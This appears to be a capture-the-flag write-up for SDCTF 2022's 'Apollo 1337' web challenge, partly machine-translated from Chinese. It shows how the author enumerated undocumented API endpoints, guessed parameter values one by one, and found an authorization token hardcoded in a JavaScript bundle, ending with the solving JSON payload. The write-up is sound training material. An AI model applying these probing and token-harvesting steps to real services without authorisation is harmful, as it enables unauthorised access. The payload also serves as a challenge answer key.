NSS [SDCTF 2022]Apollo 1337
Test point: entertainment questions. But you also need solid web skills, otherwise you won’t be able to understand it.
题目描述:Hey there intern! We have a rocket launch scheduled for noon today and the launch interface is down. You’ll need to directly use the API to launch the rocket. No, we don’t have any documentation. And quickly, our shareholders are watching!
Hello, intern! We planned to launch a rocket at noon today, but the launch interface is broken. You need to use the API directly to launch the rocket. No, we don't have any documentation. Soon, our shareholders started paying attention!
Open the question and directly return status code 500. The words in the two boxes are translated as 前端页面没有正确呈现。
and正常。所有路线运行正常。
I can't see anything in the source code, it's all js files. Go network
take a look and find that the question GETs an api interface.
The api is also mentioned in the title description, so try it from here. Just assign a value to the parameter and access it, and the status of other parts of the rocket, that is, other interfaces, will be returned.
/api/status?verbose=xxx
There are three interfaces /status
, /rocketLaunch
, /fuel
. The other two returned normal data, only /rocketLaunch
the returned data was abnormal. (When visiting, add it in front /api
, for example /api/status
)
Take out mine here postman
, hackbar can no longer be used.
Send an empty json and return rocket not specified
. (Rockets not specified)
Define a rocket name, Jay17 rocket, and send you to heaven safely. Return rocket not recognized (available: triton)
, the rocket name must betriton
Return launchTime not specified
, then we specify a launch time. The description of the problem says 计划今天中午发射一枚火箭
that noon is 11-13 o'clock, try one by one, and the launch time is 12:00
.
Return fuel pumpID not specified
. Then we define one pumpID
, look at /fuel
the routing, the range is 0-5, try one by one, yes 4
.
Return frontend authorization token not specified
, we need to specify one token
, we can’t try this one by one, we have to look for it, and finally index-309102b69640b6f8aef0.js
find it in the file, it isyiLYDykacWp9sgPMluQeKkANeRFXyU3ZuxBrj2BQ
payload:
{"rocket":"triton","launchTime":"12:00","pumpID":4,"token":"yiLYDykacWp9sgPMluQeKkANeRFXyU3ZuxBrj2BQ"}